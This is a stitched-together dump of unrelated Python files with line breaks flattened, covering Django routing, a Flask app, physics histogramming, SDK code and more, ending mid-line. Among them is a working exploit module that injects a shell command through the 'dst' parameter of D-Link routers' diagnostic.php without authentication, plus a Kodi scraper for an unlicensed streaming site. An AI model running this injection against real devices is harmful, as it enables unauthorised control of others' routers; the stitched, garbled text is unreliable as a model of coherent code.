to use `$ wmctrl -ir wid -e 0,x,y,w,h` to restore the window position # ------------ # -i # Interpret window arguments () as a numeric value rather than a string name for the window. If the nu‐ # meric value starts with the prefix '0x' it is assumed to be a hexadecimal number. # -r # Specify a target window for an action. # -e # Resize and move a window that has been specified with a -r action according to the argument. # # A move and resize argument has the format 'g,x,y,w,h'. All five components are integers. The first value, g, # is the gravity of the window, with 0 being the most common value (the default value for the window). Please # see the EWMH specification for other values. # The four remaining values are a standard geometry specification: x,y is the position of the top left corner # of the window, and w,h is the width and height of the window, with the exception that the value of -1 in any # position is interpreted to mean that the current geometry value should not be modified. # ------------ from channels import route from TEST.consumers import ws_connect, ws_receive, ws_disconnect # There's no path matching on these routes; we just rely on the matching # from the top-level routing. We _could_ path match here if we wanted. websocket_routing = [ # Called when WebSockets connect route("websocket.connect", ws_connect, path=r'^/live/(?P[^/]+)/(?P[^/]+)/$'), # Called when WebSockets get sent a data frame route("websocket.receive", ws_receive, path=r'^/live/(?P[^/]+)/(?P[^/]+)/$'), # Called when WebSockets disconnect route("websocket.disconnect", ws_disconnect, path=r'^/live/(?P[^/]+)/(?P[^/]+)/$'), ] custom_routing = [ # Handling different chat commands (websocket.receive is decoded and put # onto this channel) - routed on the "command" attribute of the decoded # message. ]script.module.fantastic/lib/resources/lib/sources/en/123hulu.py1-10 ''' fantastic Add-on Copyright (C) 2016 fantastic This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . ''' import re import urllib import urlparse import json import base64 from resources.lib.modules import client, cleantitle, directstream, dom_parser2 class source: def __init__(self): ''' Constructor defines instances variables ''' self.priority = 1 self.language = ['en'] self.domains = ['123hulu.com'] self.base_link = 'http://123hulu.com' self.movies_search_path = ('search-movies/%s.html') def movie(self, imdb, title, localtitle, aliases, year): try: clean_title = cleantitle.geturl(title).replace('-','+') url = urlparse.urljoin(self.base_link, (self.movies_search_path % clean_title)) r = client.request(url) r = dom_parser2.parse_dom(r, 'div', {'id': 'movie-featured'}) r = [dom_parser2.parse_dom(i, 'a', req=['href']) for i in r if i] r = [(i[0].attrs['href'], re.search('Release:\s*(\d+)', i[0].content)) for i in r if i] r = [(i[0], i[1].groups()[0]) for i in r if i[0] and i[1]] r = [(i[0], i[1]) for i in r if i[1] == year] if r[0]: url = r[0][0] return url else: return except Exception: return def tvshow(self, imdb, tvdb, tvshowtitle, localtvshowtitle, aliases, year): return def episode(self, url, imdb, tvdb, title, premiered, season, episode): return def sources(self, url, hostDict, hostprDict): try: sources = [] r = client.request(url) r = dom_parser2.parse_dom(r, 'p', {'class': 'server_play'}) r = [dom_parser2.parse_dom(i, 'a', req=['href']) for i in r if i] r = [(i[0].attrs['href'], re.search('/(\w+).html', i[0].attrs['href'])) for i in r if i] r = [(i[0], i[1].groups()[0]) for i in r if i[0] and i[1]] for i in r: try: host = i[1] if str(host) in str(hostDict): host = client.replaceHTMLCodes(host) host = host.encode('utf-8') sources.append({ 'source': host, 'quality': 'SD', 'language': 'en', 'url': i[0].replace('\/','/'), 'direct': False, 'debridonly': False }) except: pass return sources except Exception: return def resolve(self, url): try: r = client.request(url) url = re.findall('document.write.+?"([^"]*)', r)[0] url = base64.b64decode(url) url = re.findall('src="([^"]*)', url)[0] return url except Exception: return src/app.py0 from flask import Flask, request from src.measuring.postProcessMeasuring import PostProcessMeasuring from src.prediction.predictionWrapper import PredictionWrapper from src.utilities.errorFunctions import imagesMeanSquareError from src.utilities.errorFunctions import trueSkillStatistic app = Flask(__name__) import platform print(platform.python_version()) @app.route("/last-prediction") def last_prediction(): with open('last-prediction.json', 'r') as content_file: content = content_file.read() return content @app.route("/predict") def predict(): print('Prediction Start') result = PredictionWrapper.predict() return result @app.route("/predict-historical") def predict_historical(): date = request.args['date'] result = PredictionWrapper.predict(date) return result @app.route("/accuracy") def get_accuracy(): files = request.args.getlist('files') error_fun = request.args['error'] measuring = PostProcessMeasuring().set_files(files) if error_fun == 'mse': measuring.set_error_function(imagesMeanSquareError.ImagesMeanSquareError()) if error_fun == 'hk': measuring.set_error_function(trueSkillStatistic.TrueSkillStatistic()) return measuring.evaluate()misc/vulnpwn/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.py #!/usr/bin/python # -*- coding: utf-8 -*- ## # Current source: https://github.com/open-security/vulnpwn/ ## from lib.core import exploit import requests class Module(exploit.Exploit): __info__ = { 'name': 'Multiple Vulnerabilities in D-Link devices', 'author': ['Open-Security'], 'description': """ The vulnerability is caused by missing input validation in the dst parameter and missing session validation and can be exploited to inject and execute arbitrary shell commands. """, 'references': ['http://www.s3cur1ty.de/m1adv2013-017'], 'license': 'APACHE_LICENSE', 'disclosureDate': 'May 07 2013', 'options': { 'RHOST': ['192.168.1.1', 'the target host'], 'RPORT': [80, 'the target port'], 'TARGETURI': ['/diagnostic.php', 'target uri to request'] } } def __init__(self): exploit.Exploit.__init__(self) def check(self): cmd = 'act=ping&dst=`date -us "1991-11-11 11:11:11"' uri = 'http://{}:{}{}'.format( self.rhost, self.rport, self.get_option_value('TARGETURI')) self.output('Exploiting - {}'.format(uri)) headers = {'User-Agent': 'Mozilla/5.0 Gecko/20100101 Firefox/24.0', 'Content-Type': 'application/x-www-form-urlencoded'} sess = requests.Session() resp = sess.post(uri, headers=headers, data=cmd) if resp and resp.status_code == 200 and resp.headers and resp.headers.get('Date', None): date = resp.headers['Date'] if '11 Nov 1999 11' in date: self.output('Target is vulnable') def main(self, *args, **kwargs): self.check() """ This module compares Ruler performance to that of the Python standard re library. The idea is to match the same few lines of text and compare how long it takes using re and ruler. Since the measurements always have non-deterministic, but always positive, measurement errors, we will make many short measurements and compare the fastest ones encountered. """ import re import timeit import ruler as r TIMEIT_ITERATIONS = 10000 ATTEMPTS_COUNT = 50 # These are the strings that will be matched ann_likes_juice = 'Ann likes to drink juice' peter_likes_tea = 'Peter likes to drink tea' john_likes_tea_with_milk = 'John likes to drink tea with milk' class ReTimer(object): """ Match and time the strings using the Python standard re library """ def __init__(self): self.grammar = re.compile(r""" (?P John|Peter|Ann ) [ ]likes[ ]to[ ]drink [ ](?P (?P juice ) | (?P tea ([ ]with[ ](?P milk ))?) )""", re.VERBOSE) self.timer = timeit.Timer('self.match()', globals=locals()) def match(self): g = self.grammar.match(ann_likes_juice).groupdict() assert g['who'] == 'Ann' assert g['what'] == 'juice' assert g['juice'] is not None assert g['tea'] is None assert g['milk'] is None g = self.grammar.match(peter_likes_tea).groupdict() assert g['who'] == 'Peter' assert g['what'] == 'tea' assert g['juice'] is None assert g['tea'] is not None assert g['milk'] is None g = self.grammar.match(john_likes_tea_with_milk).groupdict() assert g['who'] == 'John' assert g['what'] == 'tea with milk' assert g['juice'] is None assert g['tea'] is not None assert g['milk'] is not None def time(self): return self.timer.timeit(TIMEIT_ITERATIONS) class RulerTimer(object): """ Match and time the strings using Ruler library """ def __init__(self): class MorningDrink(r.Grammar): who = r.OneOf('John', 'Peter', 'Ann') juice = r.Rule('juice') milk = r.Rule('milk') tea = r.Rule('tea', r.Optional(' with ', milk)) what = r.OneOf(juice, tea) grammar = r.Rule(who, ' likes to drink ', what) self.grammar = MorningDrink.create() self.timer = timeit.Timer('self.match()', globals=locals()) def match(self): g = self.grammar assert g.match(ann_likes_juice) assert g.who.matched == 'Ann' assert g.what.matched == 'juice' assert g.what.juice.matched assert g.what.tea.matched is None assert g.match(peter_likes_tea) assert g.who.matched == 'Peter' assert g.what.matched == 'tea' assert g.what.juice.matched is None assert g.what.tea.matched assert g.match(john_likes_tea_with_milk) assert g.who.matched == 'John' assert g.what.matched == 'tea with milk' assert g.what.juice.matched is None assert g.what.tea assert g.what.tea.milk def time(self): return self.timer.timeit(TIMEIT_ITERATIONS) def main(): re_timer = ReTimer() ruler_timer = RulerTimer() re_measurements = [] ruler_measurements = [] for attempt in range(ATTEMPTS_COUNT): print('Attempt {} out of {}...'.format(attempt+1, ATTEMPTS_COUNT)) re_measurements.append(re_timer.time()) ruler_measurements.append(ruler_timer.time()) print(' re: {:.3f} {}'.format(re_measurements[-1], 'New record!' if re_measurements[-1] == min(re_measurements) else '')) print(' ruler: {:.3f} {}'.format(ruler_measurements[-1], 'New record!' if ruler_measurements[-1] == min(ruler_measurements) else '')) print('Performance ratio: {}'.format(int(min(ruler_measurements) / min(re_measurements)))) if __name__ == '__main__': main() #!/usr/bin/env python # encoding: utf-8 # File : module.py # Author : # Contact : # Date : 2019 Mar 06 # # Description : import numpy as np ## rootpy import rootpy from rootpy.plotting import Hist, Hist2D from collections import OrderedDict import uproot import awkward class Module(): def __init__(self, folder): self.folderName = folder self.cuts = set() self.hist = OrderedDict() self.color=None self.linecolor=None self.markercolor=None self.fillcolor=None self.linewidth=None self.linestyle=None self.markersize=None self.markerstyle=None self.fillstyle=None ## Process info self.isData = False self.isFastsim = False self.isSUSY = False self.Lumi = 0 self.CrossSection = 0 self.ExpectedNEvent = 0 self.era = None self.process = None self.period = None self.process_full = None def ObtainInfo(self, isData, isFastsim, isSUSY, Lumi, CrossSection, era, process, period): self.isData = isData self.isFastsim = isFastsim self.isSUSY = isSUSY self.Lumi = Lumi self.CrossSection = CrossSection self.era = era self.process = process self.period = period def get_hist(self, name): return self.hist[ self.folderName+"_"+name] def set_hist(self, name, th1): self.hist[ self.folderName+"_"+name] = th1 def setHistStyle(self, name, color_=None, linecolor_=None, markercolor_=None, fillcolor_=None, linewidth_=None, linestyle_=None, markersize_=None, markerstyle_=None, fillstyle_=None): if name not in self.hist: print("Histogram is not defined yet! Not setting style for %s, exitting!" % name_) ## Setup the plotting, since TH1 inherited from TAttLine, TAttFill, TAttMarkerS color = color_ if color_ is not None else self.color if self.color is not None else None if color is not None: self.hist[name].SetLineColor(color) self.hist[name].SetMarkerColor(color) self.hist[name].SetFillColor(color) ## Set line linecolor = linecolor_ if linecolor_ is not None else self.linecolor if self.linecolor is not None else None if linecolor is not None: self.hist[name].SetLineColor(linecolor) linewidth = linewidth_ if linewidth_ is not None else self.linewidth if self.linewidth is not None else None if linewidth is not None: self.hist[name].SetLineWidth(linewidth) linestyle = linestyle_ if linestyle_ is not None else self.linestyle if self.linestyle is not None else None if linestyle is not None: self.hist[name].SetLineStyle(linestyle) ## Set Marker markercolor = markercolor_ if markercolor_ is not None else self.markercolor if self.markercolor is not None else None if markercolor is not None: self.hist[name].SetMarkerColor(markercolor) markersize = markersize_ if markersize_ is not None else self.markersize if self.markersize is not None else None if markersize is not None: self.hist[name].SetMarkerSize(markersize) markerstyle = markerstyle_ if markerstyle_ is not None else self.markerstyle if self.markerstyle is not None else None if markerstyle is not None: self.hist[name].SetMarkerStyle(markerstyle) ## Set fill fillcolor = fillcolor_ if fillcolor_ is not None else self.fillcolor if self.fillcolor is not None else None if fillcolor is not None: self.hist[name].SetFillColor(fillcolor) fillstyle = fillstyle_ if fillstyle_ is not None else self.fillstyle if self.fillstyle is not None else None if fillstyle is not None: self.hist[name].SetFillStyle(fillstyle) def th2(self, name_, xvalues, yvalues, bins, title="", xlabel="", ylabel="", cut = None, color=None, linecolor=None, markercolor=None, fillcolor=None, linewidth=None, linestyle=None, markersize=None, markerstyle=None, fillstyle=None): ''' template type of function for TH2D, including all the overloaded construction function ''' ## Create an unique name to prevent memory leak in ROOT if cut is not None: name = self.folderName+"_"+name_+"___"+cut if cut not in self.cuts: self.cuts.add(cut) else: name = self.folderName+"_"+name_ if name not in self.hist.keys(): newtitle = title+";"+xlabel+";"+ylabel self.hist[name] = Hist2D(*bins, name =name, title =newtitle) self.setHistStyle(name, color, linecolor, markercolor, fillcolor, linewidth, linestyle, markersize, markerstyle, fillstyle) #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Fill Th2 ~~~~~ x = None y = None if xvalues is None: pass elif isinstance(xvalues, awkward.JaggedArray): x = xvalues.flatten() elif isinstance(xvalues, np.ndarray): x = xvalues else: x = [xvalues] if yvalues is None: pass elif isinstance(yvalues, awkward.JaggedArray): y = yvalues.flatten() elif isinstance(yvalues, np.ndarray): y = yvalues else: y = [yvalues] self.hist[name].fill_array( np.vstack((x, y)).T) return self.hist[name] def th1(self, name_, values, xbins=None, xlow=0, xhigh=0, cut=None, weight=None, title="", xlabel="", ylabel="", \ trigRate = False, color=None, linecolor=None, markercolor=None, fillcolor=None, linewidth=None, linestyle=None, markersize=None, markerstyle=None, fillstyle=None): ## Create an unique name to prevent memory leak in ROOT if cut is not None: name = self.folderName+"_"+name_+"___"+cut if cut not in self.cuts: self.cuts.add(cut) else: name = self.folderName+"_"+name_ if name not in self.hist: newtitle = title+";"+xlabel+";"+ylabel if isinstance(xbins, (list, np.ndarray)): self.hist[name] = Hist(xbins, name =name, title =newtitle) else: self.hist[name] = Hist(xbins, xlow, xhigh, name =name, title =newtitle) self.setHistStyle(name, color, linecolor, markercolor, fillcolor, linewidth, linestyle, markersize, markerstyle, fillstyle) #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Filling ~~~~~ if values is None: return self.hist[name] localvalue = None localweight = weight if isinstance(values, awkward.JaggedArray): if weight is not None and values.flatten().size > 0: print(weight, values, values.content, values.flatten().size) localweight = weight + values - values localvalue = values.flatten() localweight = localweight.flatten() if weight is not None else None elif not isinstance(values, (list, np.ndarray)): localvalue = [values] localweight = [localweight] if weight is not None else None else: localvalue = values if trigRate: bins = np.fromiter(self.hist[name].xedges(), float) upperidx = np.searchsorted(bins, localvalue) self.hist[name].fill_array(np.concatenate([bins[:x] for x in upperidx])) else: self.hist[name].fill_array(localvalue, weights=localweight) return self.hist[name] def analyze(): return True def endJob(self, totalevents): return True def SaveHist(self, outfile): outfile.cd() outfile.mkdir(self.folderName) histmap = {"Default" : {}} for c in self.cuts: outfile.mkdir(self.folderName + "_"+c) histmap[c] = {} for k, v in self.hist.items(): cutname = k.split("___", 1)[-1] orgname = k.split("_", 1)[1].split("___", 1)[0] if cutname in histmap.keys(): histmap[cutname][k] = orgname else: histmap["Default"][k] = orgname for k, v in histmap.items(): if k is "Default": outfile.cd(self.folderName) else: outfile.cd(self.folderName + "_"+k) for j in v.keys(): h = self.hist[j] h.SetName(v[j]) h.Write() tests/unit/test_exceptions.py #!/usr/bin/env python # -*- coding: utf-8 -*- from __future__ import absolute_import, unicode_literals import pickle import unittest from mock import MagicMock as Mock import pyrax.utils as utils import pyrax.exceptions as exc from pyrax import fakes fake_url = "http://example.com" class ExceptionsTest(unittest.TestCase): def __init__(self, *args, **kwargs): super(ExceptionsTest, self).__init__(*args, **kwargs) def setUp(self): pass def tearDown(self): pass def test_from_response_no_body(self): fake_resp = fakes.FakeResponse() fake_resp.status_code = 666 ret = exc.from_response(fake_resp, None) self.assertTrue(isinstance(ret, exc.ClientException)) self.assertEqual(ret.code, fake_resp.status_code) def test_from_response_with_body(self): fake_resp = fakes.FakeResponse() fake_resp.status_code = 666 fake_body = {"error": { "message": "fake_message", "details": "fake_details"}} ret = exc.from_response(fake_resp, fake_body) self.assertTrue(isinstance(ret, exc.ClientException)) self.assertEqual(ret.code, fake_resp.status_code) self.assertEqual(ret.message, "fake_message") self.assertEqual(ret.details, "fake_details") self.assertTrue("HTTP 666" in str(ret)) def test_pickle(self): error = exc.NotFound(42, 'message', 'details', 0xDEADBEEF) pickled_error = pickle.dumps(error, -1) unpickled_error = pickle.loads(pickled_error) self.assertIsInstance(unpickled_error, exc.NotFound) self.assertEqual(unpickled_error.code, 42) self.assertEqual(unpickled_error.message, 'message') self.assertEqual(unpickled_error.details, 'details') self.assertEqual(unpickled_error.request_id, 0xDEADBEEF) if __name__ == "__main__": unittest.main() 1-10 import os import torch import util.data_transformer as transforms from data.test_dataset import ImageFolder import util.extract_feature as ext_feat from eval.eval_1v1 import * def cfp_test_gpu(cfp_path, model, method='FP'): batch_size = 200 workers = 8 method_set = 'CFP' cfp_data_path = os.path.join(cfp_path, 'Align_180_220/') meta_path = os.path.join(cfp_path, 'myMeta/%s_meta.txt' % method) model.eval() with torch.no_grad(): # test dataloader transform = transforms.Compose([ transforms.CenterCropWithOffset(150, 150, 0, 20, 0, 0, ignore_fault=True), transforms.Scale((112, 112)), transforms.ToTensor(), transforms.Normalize(mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5]) ]) test_dataset = ImageFolder( root=cfp_data_path, proto=os.path.join(cfp_path, 'myMeta/Pair_list_A.txt'), transform=transform, method=method_set ) test_dataloader = torch.utils.data.DataLoader( test_dataset, batch_size=batch_size, shuffle=False, num_workers=workers, pin_memory=True) feature = ext_feat.extract_feature(test_dataloader, model) # feature extraction feature_np = feature.numpy().astype(np.float32) best_acc, best_thresh = base_1v1(feature_np, meta_path, method_set, similarity=cosine_similarity) print('CFP-%s acc is %f at threshold %f' % (method, best_acc, best_thresh)) return best_acc, best_thresh # Generated by Django 2.0 on 2018-09-18 16:55 from django.db import migrations import django.db.models.manager class Migration(migrations.Migration): dependencies = [ ('links', '0014_classwebsite'), ] operations = [ migrations.AlterModelOptions( name='actionbutton', options={'default_manager_name': 'base_manager', 'get_latest_by': 'update_date', 'ordering': ['inline_order'], 'permissions': (('trash_actionbutton', 'Can soft delete action button'), ('restore_resourcelink', 'Can restore action button')), 'verbose_name': 'Action Button', 'verbose_name_plural': 'Action Buttons'}, ), migrations.AlterModelOptions( name='classwebsite', options={'default_manager_name': 'base_manager', 'get_latest_by': 'update_date', 'ordering': ['inline_order'], 'permissions': (('trash_classwebsite', 'Can soft delete class website'), ('restore_resourcelink', 'Can restore class website')), 'verbose_name': 'Class Website', 'verbose_name_plural': 'Class Websites'}, ), migrations.AlterModelOptions( name='resourcelink', options={'default_manager_name': 'base_manager', 'get_latest_by': 'update_date', 'ordering': ['inline_order'], 'permissions': (('trash_resourcelink', 'Can soft delete resource link'), ('restore_resourcelink', 'Can restore resource link')), 'verbose_name': 'Resource Link', 'verbose_name_plural': 'Resource Links'}, ), migrations.AlterModelManagers( name='actionbutton', managers=[ ('base_manager', django.db.models.manager.Manager()), ], ), migrations.AlterModelManagers( name='classwebsite', managers=[ ('base_manager', django.db.models.manager.Manager()), ], ), migrations.AlterModelManagers( name='resourcelink', managers=[ ('base_manager', django.db.models.manager.Manager()), ], ), ] lib/bindings/samples/server/API/handlers.py #!/usr/bin/env python import inspect import json import logging import schema import jsonschema from concurrent.futures import Future import tornado import tornado.gen import tornado.web from tornado.web import RequestHandler, StaticFileHandler import errors class BaseHandler(RequestHandler): def data_received(self, chunk): raise NotImplementedError() class IndexPageHandler(BaseHandler): def get(self): self.render(MAIN_INDEX, status="Ready", info="Retrieving data ...") class StaticTextFileHandler(StaticFileHandler): def set_default_headers(self): self.set_header('Content-Type', 'text/plain') class DevStaticFileHandler(StaticFileHandler): def set_extra_headers(self, path): # Disable cache self.set_header( 'Cache-Control', 'no-store, no-cache, must-revalidate, max-age=0') logger = logging.getLogger(__name__) logger.addHandler(logging.NullHandler()) class CommandHandler(tornado.web.RequestHandler): """REST Command Handler Routes json command in the form {'name' : 'apiHandler.function', 'parameters' : {}} to the right apiHandler instance function (see https://developers.google.com/streetview/open-spherical-camera/ for an overview of the protocol) This handler supports synchronous and asyncronous calls. Asynchronous API methods must be decorated with @run_on_executor and the enclosing class must provide an 'executor' ThreadPoolExecutor class instance. Example::: class MyAPIHandler(APIHandler): executor = ThreadPoolExecutor(1) @run_on_executor def asynchronousAPI (self, parameters) : return def synchronousAPI (self, parameters) : return """ def initialize(self, apiHandlers, extra): self.apiHandlers = apiHandlers self.extra = extra self.verbose = extra["verbose"] def set_default_headers(self): self.set_header("Access-Control-Allow-Origin", "*") self.set_header("Access-Control-Allow-Headers", "x-requested-with") self.set_header('Access-Control-Allow-Methods', 'POST') @tornado.gen.coroutine def post(self): try: data = json.loads(self.request.body) except ValueError: raise tornado.web.HTTPError(400, "Ill-formed message command") # Split command name command_name = data.get("name") if command_name is None: raise tornado.web.HTTPError(400, "No command name") if command_name.count(".") != 1: raise tornado.web.HTTPError(400, "Invalid command name") (class_name, function_name) = command_name.split(".") # Create a handler instance class_instance = self.apiHandlers.get(class_name) if class_instance is None: raise tornado.web.HTTPError(400, "Unknown handler " + class_name) instance = class_instance(self.extra) # Validate parameters validate = data.get("validate", True) log = data.get("log", True) try: parameters = data.get("parameters") if self.verbose and log: logger.info( "> " + class_name + "." + function_name + "(" + \ json.dumps(parameters) + ")") if validate: schema.api.validate_parameters(command_name, parameters) except jsonschema.ValidationError as ve: e = errors.InvalidParameter(str(ve)).payload m = {'error': e} logger.error(command_name + ", invalid parameter:\n" + str(ve)) else: # Call instance method if not hasattr(instance, function_name): raise tornado.web.HTTPError( 400, "Unknown function " + command_name) # call method function = getattr(instance, function_name) future = function(parameters) try: if isinstance(future, Future) or isinstance( future, tornado.concurrent.Future): result = yield future else: f = Future() f.set_result(future) result = yield f except errors.VSError as e: m = {'error': e.payload} else: # Validate result try: if validate: schema.api.validate_result(command_name, result) except jsonschema.ValidationError as ve: e = errors.InvalidReturnValue(str(ve)).payload m = {'error': e} logger.error(command_name + ", invalid return value:\n" + str(ve)) else: m = {'results': result} if self.verbose and log: logger.info("< " + json.dumps(m)) self.write(m) self.finish() class APIHandler(object): """Base class for APIHandlers """ def __init__(self, extra): pass def get_methods(self): """Get the list of exposed methods for the API Returns: A list of methods available. """ members = [] for member in inspect.getmembers(self, predicate=inspect.ismethod): if member[0] not in ["__init__", "ok", "error"]: members.append(member[0]) return members bundle_cache/app_store/tk-multi-demo/v1.0.2/python/tk_multi_demo/demos/custom_field_widget/favorite_widget.py # Copyright (c) 2016 Shotgun Software Inc. # # CONFIDENTIAL AND PROPRIETARY # # This work is provided "AS IS" and subject to the Shotgun Pipeline Toolkit # Source Code License included in this distribution package. See LICENSE. # By accessing, using, copying or modifying this work you indicate your # agreement to the Shotgun Pipeline Toolkit Source Code License. All rights # not expressly granted therein are reserved by Shotgun Software Inc. import sgtk # import the shotgun_fields module from the qtwidgets framework shotgun_fields = sgtk.platform.import_framework( "tk-framework-qtwidgets", "shotgun_fields") # the default shotgun fields checkbox widget DefaultCheckBoxWidget = shotgun_fields.checkbox_widget.CheckBoxWidget class MyProjectFavoritesWidget(DefaultCheckBoxWidget): """ A custom display widget for the Project entity's "favorite" field. Shotgun also displays this field in a custom way. """ # defining the meta class will register this class for use by the # field manager widget factory. the simple act of importing this class # will be enough to register it and apply it to the project favorite field. __metaclass__ = shotgun_fields.ShotgunFieldMeta # make this class usable as both an editor and display widget for fields # of type "checkbox" _DISPLAY_TYPE = "checkbox" _EDITOR_TYPE = "checkbox" # define which specific entities & fields this widget should be used for _ENTITY_FIELDS = [("Project", "current_user_favorite")] # NOTE: Here we are subclassing the default shotgun fields check box # widget and applying a different style to it (see the demo's style.qss # file). soma2000-lang/colourcolour/characterisation/datasets/lenses/sds.py """ Spectral Distributions of Lenses ================================ Defines the spectral distributions of lenses. Each lens data is in the form of :class:`dict` class instance of :class:`colour.SpectralDistribution` classes as follows:: {'name': SpectralDistribution, ..., 'name': SpectralDistribution} The following *lenses* are available: - ISO Standard Lens References ---------- - :cite:`InternationalOrganizationforStandardization2002` : International Organization for Standardization. (2002). INTERNATIONAL STANDARD ISO 7589-2002 - Photography - Illuminants for sensitometry - Specifications for daylight, incandescent tungsten and printer. """ from __future__ import annotations from functools import partial from colour.colorimetry import SpectralDistribution from colour.hints import Dict from colour.utilities import LazyCaseInsensitiveMapping __author__ = "Colour Developers" __copyright__ = "Copyright (C) 2013-2022 - Colour Developers" __license__ = "New BSD License - https://opensource.org/licenses/BSD-3-Clause" __maintainer__ = "Colour Developers" __email__ = "" __status__ = "Production" __all__ = [ "DATA_LENSES_ISO", "SDS_LENSES_ISO", "SDS_LENSES", ] DATA_LENSES_ISO: Dict = { "ISO Standard Lens": { 350: 0.00, 360: 0.07, 370: 0.23, 380: 0.42, 390: 0.60, 400: 0.74, 410: 0.83, 420: 0.88, 430: 0.91, 440: 0.94, 450: 0.95, 460: 0.97, 470: 0.98, 480: 0.98, 490: 0.99, 500: 0.99, 510: 1.00, 520: 1.00, 530: 1.00, 540: 1.00, 550: 1.00, 560: 1.00, 570: 1.00, 580: 1.00, 590: 0.99, 600: 0.99, 610: 0.99, 620: 0.98, 630: 0.98, 640: 0.97, 650: 0.97, 660: 0.96, 670: 0.95, 680: 0.94, 690: 0.94, } } SDS_LENSES_ISO: LazyCaseInsensitiveMapping = LazyCaseInsensitiveMapping( { "ISO Standard Lens": partial( SpectralDistribution, DATA_LENSES_ISO["ISO Standard Lens"], name="ISO Standard Lens", ), } ) SDS_LENSES_ISO.__doc__ = """ Spectral distributions of *ISO* lenses. References ---------- :cite:`InternationalOrganizationforStandardization2002` """ SDS_LENSES: LazyCaseInsensitiveMapping = LazyCaseInsensitiveMapping( SDS_LENSES_ISO ) SDS_LENSES.__doc__ = """ Spectral distributions of lenses. References ---------- :cite:`InternationalOrganizationforStandardization2002` """ import logging import logging.config logging.config.dictConfig({ 'version': 1, 'handlers': { 'console': { 'class': 'logging.StreamHandler' } }, 'loggers': { 'default': { 'level': 'DEBUG', 'handlers': ['console'] } } }) logger = logging.getLogger('default') from logger_loco import loco external_var = 12 MYCONST = 10 @loco(logger) def myfunc(a, b, x=MYCONST): # Regular comment #@ Debug #- Info #! Warning #X Error #@ Inject {a} + {b} = {a + b} #@ External var: {external_var} #@ Comment with manny backslashes \\\\\\ and quotes ''' #--> #@ Indented #<-- #@ Not indented return a + b @loco(logger, indent_size=4) def fun2(): #--> #@ Indented with 4 spaces #--> #@ Indented deeper #<-- #<-- #@ Regular ... @loco(logger) def func3(): # some # ... #... #... try: raise Exception('Some error') except Exception as e: print(e) myfunc(1, 2) fun2() func3() class OtherClass(object): pass @loco(logger) class MyCalss(OtherClass): def __init__(self, *args, **kw): super().__init__(*args, **kw) def method_a(self, a, b): #- Works inside class method a + b = {a + b} ... MyCalss().method_a(1, 2) 1-10 import cv2 import torch import numpy as np from PIL import Image from torchvision import transforms from .commons import sample_frames_metafunc, sample_clips_metafunc, preprocess_frame_metafunc, preprocess_clip_metafunc class VideoDataset(object): def __init__(self, stride, mean, std, resize_to, crop_to, type='frame'): self.sample_func = sample_frames_metafunc(stride) self.preprocess_func = preprocess_frame_metafunc(mean, std, resize_to, crop_to) """ self.preprocess_func2 = transforms.Compose([ transforms.Resize(resize_to), #transforms.CenterCrop(crop_to), transforms.ToTensor(), transforms.Normalize(mean, std), ]) """ if type == 'clip': self.sample_func = sample_clips_metafunc(stride) self.preprocess_func = preprocess_clip_metafunc(mean, std, resize_to, crop_to) def __call__(self, video_fpath): X = self.sample_func(video_fpath) if X.shape[0] == 0: return None self.samples = X return self def __getitem__(self, idx): sample = self.samples[idx] #sample = Image.fromarray(sample, mode='RGB') sample = self.preprocess_func(sample) if len(sample.shape) == 3: # HxWxC --> CxHxW sample = sample.transpose((2, 0, 1)) elif len(sample.shape) == 4: # NxHxWxC --> CxNxHxW sample = sample.transpose((3, 0, 1, 2)) else: raise NotImplementedError("Unknown sample of shape {}".format(sample.shape)) return torch.from_numpy(sample).float() def __len__(self): return self.samples.shape[0] liumihust/aliyun-openapi-python-sdkaliyun-python-sdk-emr/aliyunsdkemr/request/v20160408/AddHpHostRequest.py # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # # http://www.apache.org/licenses/LICENSE-2.0 # # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. from aliyunsdkcore.request import RpcRequest from aliyunsdkemr.endpoint import endpoint_data class AddHpHostRequest(RpcRequest): def __init__(self): RpcRequest.__init__(self, 'Emr', '2016-04-08', 'AddHpHost','emr') if hasattr(self, "endpoint_map"): setattr(self, "endpoint_map", endpoint_data.getEndpointMap()) if hasattr(self, "endpoint_regional"): setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional()) def get_ResourceOwnerId(self): return self.get_query_params().get('ResourceOwnerId') def set_ResourceOwnerId(self,ResourceOwnerId): self.add_query_param('ResourceOwnerId',ResourceOwnerId) def get_HpHosts(self): return self.get_query_params().get('HpHosts') def set_HpHosts(self,HpHosts): for i in range(len(HpHosts)): if HpHosts[i].get('CpuCore') is not None: self.add_query_param('HpHost.' + str(i + 1) + '.CpuCore' , HpHosts[i].get('CpuCore')) if HpHosts[i].get('MemSize') is not None: self.add_query_param('HpHost.' + str(i + 1) + '.MemSize' , HpHosts[i].get('MemSize')) if HpHosts[i].get('RackInfo') is not None: self.add_query_param('HpHost.' + str(i + 1) + '.RackInfo' , HpHosts[i].get('RackInfo')) if HpHosts[i].get('Role') is not None: self.add_query_param('HpHost.' + str(i + 1) + '.Role' , HpHosts[i].get('Role')) if HpHosts[i].get('SerialNumber') is not None: self.add_query_param('HpHost.' + str(i + 1) + '.SerialNumber' , HpHosts[i].get('SerialNumber')) if HpHosts[i].get('HostType') is not None: self.add_query_param('HpHost.' + str(i + 1) + '.HostType' , HpHosts[i].get('HostType')) if HpHosts[i].get('SecurityGroupId') is not None: self.add_query_param('HpHost.' + str(i + 1) + '.SecurityGroupId' , HpHosts[i].get('SecurityGroupId')) for j in 